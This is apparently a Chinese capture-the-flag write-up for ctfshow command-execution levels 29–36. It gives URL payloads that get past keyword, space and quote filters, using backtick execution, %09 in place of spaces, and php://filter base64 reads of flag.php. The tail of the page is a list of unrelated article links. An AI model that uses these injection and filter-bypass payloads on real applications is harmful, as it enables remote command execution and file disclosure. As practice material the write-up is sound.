ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
zh_yt7 分钟前
auto-connect remote ssh server
运维·ssh
Lumbrologist18 分钟前
【零基础部署】Docker 部署 AutoGen 多 Agent 对话框架保姆级教程
运维·docker·容器
嵌入式小能手43 分钟前
飞凌嵌入式ElfBoard-进程间的通信之信号的发送alarm
linux
feng14562 小时前
OpenSREClaw - AI 本体论思维
运维·人工智能
用户2367829801682 小时前
Linux systemctl 服务管理命令:从 systemd 架构到实战技巧
linux
LIZHUOLONG12 小时前
linux 设备初始化
linux·运维·服务器
遇印记2 小时前
软考知识点(局域网基础)
运维·服务器·局域网
lulu12165440783 小时前
Codex Computer Use 深度分析:AI桌面自动化的技术突破与行业影响
java·运维·人工智能·自动化·ai编程
難釋懷3 小时前
Nginx-CA 签名
服务器·nginx·ssl
雪霁清寒3 小时前
麒麟V10用MobaXterm远程连接SSH偶尔卡顿的问题
linux·ssh